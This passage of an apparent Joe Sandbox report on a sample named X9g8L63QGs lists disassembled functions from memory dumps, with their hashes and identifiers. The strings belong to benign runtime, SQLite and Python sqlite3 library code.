                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                                                                                                                    • API String ID: 0-3207858774
                                                                                                                                                                                                                                                                    • Opcode ID: 6ea09e53c78372fd51fc6217c56ea2e3ac166cdbb3b457d9f2a8c27783302216
                                                                                                                                                                                                                                                                    • Instruction ID: 21f95a551f79e368d2a4021ed11e50ab3ced67fecd41bbfd0027d7713ff42324
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ea09e53c78372fd51fc6217c56ea2e3ac166cdbb3b457d9f2a8c27783302216
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F281ADE2B08E868AFB10AF34D5582F923A2AB55B64F645132DE4D03795DF3CE946C390
                                                                                                                                                                                                                                                                    Function 00007FFB1C259358 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-1464470183
                                                                                                                                                                                                                                                                    • Opcode ID: af40fed7b60034fd5c5e0a5ae54bcf9e4d80c7769b22b13ab88bd66fa3393346
                                                                                                                                                                                                                                                                    • Instruction ID: 8e6988c52f786e2bec4e648838aa27d8f4edd40a3b11ac3f2d20a2bde2a8fb1b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af40fed7b60034fd5c5e0a5ae54bcf9e4d80c7769b22b13ab88bd66fa3393346
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0514DE1F18E628AEB10FB74E8485ED2772BB06364F640035DE0D57B98DF68E955C780
                                                                                                                                                                                                                                                                    Function 00007FFB0C1AB530 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 190073905-0
                                                                                                                                                                                                                                                                    • Opcode ID: e017fc91d69bddb9aae330796ab311efe2c6512c7b4295912f4e83d96bc88404
                                                                                                                                                                                                                                                                    • Instruction ID: 952d2c21f5f4bbb41483aea067b41e872e086a53fd06919717b55bbe5ee7795e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e017fc91d69bddb9aae330796ab311efe2c6512c7b4295912f4e83d96bc88404
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3981B0F1E0C28787FA54AB76D459EB926D1AF45B80F4840B5DA0C473E6DF7CE8568B00
                                                                                                                                                                                                                                                                    Function 00007FFB1BB1A250 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 190073905-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8f3bb3efd0dc3dc77f511d6591a1c1719394010db589a06ea761acdf96903b58
                                                                                                                                                                                                                                                                    • Instruction ID: cfbb10fe3126f1148c559b81d2f2176fdc6120e20b7c48e0bd93523359cc5504
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f3bb3efd0dc3dc77f511d6591a1c1719394010db589a06ea761acdf96903b58
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B816AA9E08E42C6F671AB75F44137B62D2FF857A0F54E035D92C52AB6DE2CF8468600
                                                                                                                                                                                                                                                                    Function 00007FFB1AB03D20 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFB1AB00000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714712112.00007FFB1AB00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB0E000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB11000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714860777.00007FFB1AB12000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714897323.00007FFB1AB13000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ab00000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 190073905-0
                                                                                                                                                                                                                                                                    • Opcode ID: ebbc11ed6d4e2b153bf3b51c5f0c9a30cc048fc894ebc4ddcddd757e94eb54ba
                                                                                                                                                                                                                                                                    • Instruction ID: 66cb7cb02361b29f9eae1c642b68e93770d181a7344dd1ab956563e7f869aa6a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebbc11ed6d4e2b153bf3b51c5f0c9a30cc048fc894ebc4ddcddd757e94eb54ba
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B781A0A9E09EC346F670AB75D6C427B56BBAF417A0F0481B7DA0C63293DE2CF8458210
                                                                                                                                                                                                                                                                    Function 00007FFB1D5B1190 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1716138569.00007FFB1D5B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFB1D5B0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1716097392.00007FFB1D5B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1716138569.00007FFB1D5B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1716221369.00007FFB1D5BA000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1716259793.00007FFB1D5BC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1d5b0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 190073905-0
                                                                                                                                                                                                                                                                    • Opcode ID: b57b117b731fe6fadf01a2aa5e6dfd03c7664753ee25818152bc9f2dcd8646e2
                                                                                                                                                                                                                                                                    • Instruction ID: b71b467a31af8f517c4930e8631eb92ce16f5ab412854cdd3834d63191835016
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b57b117b731fe6fadf01a2aa5e6dfd03c7664753ee25818152bc9f2dcd8646e2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE818AA1E0CE4386FA949B76D441AB97293AF8D7A0F548335DE0D97696FF3CE8058700
                                                                                                                                                                                                                                                                    Function 00007FFB0C082070 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 414COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2846519077
                                                                                                                                                                                                                                                                    • Opcode ID: f9b62292e15983dd92f3d336a42f126a0ce1eb18eb7dc8c6fabe0fe700413ad5
                                                                                                                                                                                                                                                                    • Instruction ID: b81e9b527ff7efcf1b31070570f902784f109845723cc08e3c5e8d03cb392498
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9b62292e15983dd92f3d336a42f126a0ce1eb18eb7dc8c6fabe0fe700413ad5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27029DF2A0868286EB149B31D418BAA37A5FF85B84F408235DA8D07796EF3CE555C708
                                                                                                                                                                                                                                                                    Function 00007FFB1C251E9C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 211107550-393685449
                                                                                                                                                                                                                                                                    • Opcode ID: 579c448420c1f2a36cb32246af93653fbc5f1fd4bf1dbfa0e8ef84cdd48a3a2d
                                                                                                                                                                                                                                                                    • Instruction ID: 01707ce710b01b15d1389618744436e6178d0282794980ae9cffa40c253f3bbb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 579c448420c1f2a36cb32246af93653fbc5f1fd4bf1dbfa0e8ef84cdd48a3a2d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99E183F2908A818BE710AF74D4483EE77A2FB56768F244135EA8D57795DF38E881C780
                                                                                                                                                                                                                                                                    Function 00007FFB0C1A4430 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 198COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007F805
                                                                                                                                                                                                                                                                    • String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$argument 1$execute$factory must return a cursor, not %.100s$str
                                                                                                                                                                                                                                                                    • API String ID: 4011786353-652842647
                                                                                                                                                                                                                                                                    • Opcode ID: 269fade6d050ff23afb70b2ed00da13a9c7e305b9570e32f8a79332b38a23695
                                                                                                                                                                                                                                                                    • Instruction ID: cda3a872c6ff2242a8c1601fa1d6f39b4534e31376831215d223b3bf7d7dc6b9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 269fade6d050ff23afb70b2ed00da13a9c7e305b9570e32f8a79332b38a23695
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F9138F2A09A42C6EA548F76E45897923A0FF85F95F1050B2CA0E43764EF7DE886C740
                                                                                                                                                                                                                                                                    Function 00007FFB0C030A30 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: new[]
                                                                                                                                                                                                                                                                    • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                                                    • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                                                                    • Opcode ID: 7514e8fd5d93be79fc71e0024bcf4f49aeb845a9e117b097cb897556365a7ddf
                                                                                                                                                                                                                                                                    • Instruction ID: f1dbb15dc59035a5518c761e0081634d226e979d6a9a94eee62efcd31712d85f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7514e8fd5d93be79fc71e0024bcf4f49aeb845a9e117b097cb897556365a7ddf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5851BFE1E0D68285FB159F71E419EBA6695BF44B88F484036ED4D07686EF3CE849C70C
                                                                                                                                                                                                                                                                    Function 00007FFB1C25B088 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-2239912363
                                                                                                                                                                                                                                                                    • Opcode ID: b834bdc2b4e624d8bfe4a0aa6ffd56aa1f04fb76a255bf56b0e6c1b80a1fdf25
                                                                                                                                                                                                                                                                    • Instruction ID: 5d3ef1d631bd698dfa74c398e5f6b4b859a9604e4cc250179dd2aaa65598eb5e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b834bdc2b4e624d8bfe4a0aa6ffd56aa1f04fb76a255bf56b0e6c1b80a1fdf25
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F514DE2E18F918AFB51AB74D8482FD37A2BB05764F648135CE4D12B95DF3CA484CB90
                                                                                                                                                                                                                                                                    Function 00007FFB0C1A5DC2 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 72COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007
                                                                                                                                                                                                                                                                    • String ID: delete$insert$replace$update
                                                                                                                                                                                                                                                                    • API String ID: 3568877910-310407209
                                                                                                                                                                                                                                                                    • Opcode ID: 739cd27492189b4eb9725564864e3e8f9d5b5a4e658c2c2cb9fed5de0871bc61
                                                                                                                                                                                                                                                                    • Instruction ID: a63d0bd592655da8b0d91c9d4fd7ed267cf528236de650dc149935090b1adb3a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 739cd27492189b4eb9725564864e3e8f9d5b5a4e658c2c2cb9fed5de0871bc61
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D31C7E1A0CA5252FA218B36E41CB792692AF46FC1F4840B6CD0D47789EF2CEA46C310
                                                                                                                                                                                                                                                                    Function 00007FFB0C1A5E2B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 72COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007
                                                                                                                                                                                                                                                                    • String ID: delete$insert$replace$update
                                                                                                                                                                                                                                                                    • API String ID: 3568877910-310407209
                                                                                                                                                                                                                                                                    • Opcode ID: 079422f59c99687c438c33ad3758d41ccbbcb508bdff5314d6c380242662e6a6
                                                                                                                                                                                                                                                                    • Instruction ID: 4dbfc05de1d542b759a33d499eea5b1085cae6294a39aa1420bd784b2b364964
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 079422f59c99687c438c33ad3758d41ccbbcb508bdff5314d6c380242662e6a6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F219AE1A0CA5351FA258B36E44CB786796AF46F81F4880F2CD4D87689EF2DE647C350
                                                                                                                                                                                                                                                                    Function 00007FFB0C1A5D5C Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
